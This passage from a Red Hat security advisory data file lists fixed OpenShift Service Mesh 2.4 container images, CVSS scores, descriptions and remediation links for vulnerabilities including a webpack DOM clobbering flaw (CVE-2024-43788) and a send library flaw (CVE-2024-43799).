"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "envoy: Brotli decompressor infinite loop"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:22:37+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7724"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:9a6c7a3afacb314f8a95f37df0b7cf308be68bb43690d545c4afabadfa3a620c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:724008ca455a9a604566e9ca40c6d133466f18c82c27ea7826956a5cf928943a_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:7423b83773835e7d4cfbe5618e7338fb62e41066aefd69f894900888a658d7a6_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:826840b00f91d89aa9520ceac0536668ff0465c819df3a3ca346ab343071d42f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-cni-rhel8@sha256:baa908c7ba436f9289ac6b5258db529e0819a2ae20ea3098e3c8c14f11bd915f_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:49f616b946db7539d70f7e88262c401be1bbcd7f17131f2770e7808094186b76_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:cef9723c32c6183fcfee561c3dd2562e021f4db8db6c0073a9000c43265cb1b0_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:e2ef0cab4f5aad815ee827d739a1452761fcdaf2e2d8ad88fbe35d3d9dd43b23_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/istio-must-gather-rhel8@sha256:eb32c35bc468dc0bee7570a7dc683e11de02e07dcffeb6b4167a73e9bfd0dd9e_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:05bdfe2430b6ffbdeb92f266460252924cc900fd2a70472fd4243cf1daaa49a5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:2f2e9c6c51a8f40b028aa626c8e54d1bf090d59503481b1a748411d1279776b2_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:afee81896a35fdadbe3f4434133f79bdb8f7c37b0aa8ddf0ab4cd2cde864132f_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/kiali-rhel8@sha256:c84cac102698963002273f11ae476d39fcf73df4cba3a7ee42cdc7d7c357ce0c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:31c138edef9a73b2e225c69972b91e6272b073d0c07718b51ff8024ef179f2e5_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:afa11a535d8dac276bcc81d6f04ad0e7be6bef126c1d5c92accdef5f675dc69f_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:ca7374e5fd181649245562b75eb6f0f7a232817ba83b4f5fd73a7144f8a41e30_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/pilot-rhel8@sha256:f2eca6cadd2e62b3bfd4561cd8d08cb8f1c24f676920078b92a2f17ed3d85525_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:77299b80d61d8792f7477325c2dcead898c1977c79c4dff34a5c7dfd74804c39_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:981a3342696504fa87ae21268e0f32aa5cd85a74c596dac123a3a91e8fad5329_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:b5181f27a7cfbb72d25979aa7bacc2916c83160f43be423db540f670a615ca53_amd64",
"8Base-RHOSSM-2.4:openshift-service-mesh/proxyv2-rhel8@sha256:cdf06c67f72b263ef3ac34205509eebbfe3cdee72919560c1de958678295c2b5_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:2d2c3dd2aaf72a111aeb9e5d4b4b61685327af3ca7718f0c205ac2d2d0fcbb1c_s390x",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:ac3c9594ceeb9414878ea612339cd4dd70afe536cd7d5f97e88c39b4388f0dbe_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c07e83323755fcab6ea7942ce8597f6da29b136a23164bb2e818fb6b82cfaa67_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/ratelimit-rhel8@sha256:c9a3312e373b9711b6017c939a124220e9635572f7435c5ece2be5c65d733cf6_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule"
},
{
"cve": "CVE-2024-43799",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:30.869487+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311153"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Send library. This vulnerability allows remote code execution via untrusted input passed to the SendStream.redirect() function.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "send: Code Execution Vulnerability in Send Library",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:2e77f63106ba54fb53734eb8e93431894d2dcd91f0bab4b11f14a98483386293_ppc64le",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:71133dd62fbae99d9494c9fe23fd3bb1f7b2c01127a4672a7acecb448df15972_arm64",
"8Base-RHOSSM-2.4:openshift-service-mesh/grafana-rhel8@sha256:7e27c85e14c08b6495ed6142155e7a94736fd729b5b261017e48afb7c003ecb2_amd64",
